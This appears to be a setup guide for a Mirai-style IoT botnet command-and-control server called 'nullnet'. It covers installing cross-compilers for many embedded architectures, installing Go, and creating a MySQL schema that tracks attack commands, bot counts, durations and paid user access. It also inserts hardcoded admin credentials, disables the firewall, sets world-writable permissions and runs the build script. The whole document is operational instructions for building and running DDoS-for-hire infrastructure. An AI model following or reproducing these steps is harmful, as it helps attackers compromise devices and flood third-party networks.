REPLACE_IP_SERVER - change in all files
-----------------------------------------------------------------------------------
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence python sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y
mkdir /etc/xcompile
mv libs/cross-compiler-i586.tar.bz2 /etc/xcompile
mv libs/cross-compiler-i686.tar.bz2 /etc/xcompile
mv libs/cross-compiler-m68k.tar.bz2 /etc/xcompile
mv libs/cross-compiler-mips.tar.bz2 /etc/xcompile
mv libs/cross-compiler-mipsel.tar.bz2 /etc/xcompile
mv libs/cross-compiler-powerpc.tar.bz2 /etc/xcompile
mv libs/cross-compiler-sh4.tar.bz2 /etc/xcompile
mv libs/cross-compiler-sparc.tar.bz2 /etc/xcompile
mv libs/cross-compiler-armv4l.tar.bz2 /etc/xcompile
mv libs/cross-compiler-armv5l.tar.bz2 /etc/xcompile
mv libs/cross-compiler-armv6l.tar.bz2 /etc/xcompile
mv libs/cross-compiler-armv7l.tar.bz2 /etc/xcompile
mv libs/arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz /etc/xcompile
mv libs/cross-compiler-powerpc-440fp.tar.bz2 /etc/xcompile
mv libs/cross-compiler-x86_64.tar.bz2 /etc/xcompile
mv libs/cross-compiler-i486.tar.gz /etc/xcompile
cd /etc/xcompile


tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -vxf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
tar -jxf cross-compiler-powerpc-440fp.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
tar -xvf cross-compiler-i486.tar.gz
rm -rf *.tar.bz2
rm -rf *.tar.gz
rm -rf *.tar
rm -rf *.tar.xz
mv cross-compiler-i486 i486
mv cross-compiler-i586 i586
mv cross-compiler-i686 i686
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc
mv cross-compiler-powerpc-440fp powerpc-440fp
mv cross-compiler-x86_64 x86_64
-----------------------------------------------------------------------------------
                                  GOLANG                                           
cd /tmp
wget https://golang.org/dl/go1.17.8.linux-amd64.tar.gz -q
tar -xzf go1.17.8.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/project/nullnet
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
-----------------------------------------------------------------------------------
                                  MYSQL                                            
yum install mariadb-server
systemctl start mariadb

service mariadb restart
mysql_secure_installation

CREATE DATABASE nullnet;
use nullnet;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);

INSERT INTO users VALUES (NULL, 'zile', 'nullinfull#', 0, 0, 0, 0, -1, 1, 30, 'apikey1#');
INSERT INTO users VALUES (NULL, 'api_user', 'nullinfull#', 0, 0, 0, 0, -1, 1, 30, 'apikey2#');

quit;
-------------------------------------------------------------------------------------------------

iptables -F; service iptables stop; service httpd restart; service mysqld restart; sed -i 's/1024/9999999/g' /usr/include/bits/typesizes.h; ulimit -n999999; ulimit -u999999; ulimit -e999999
chmod -R 777 *
bash build.sh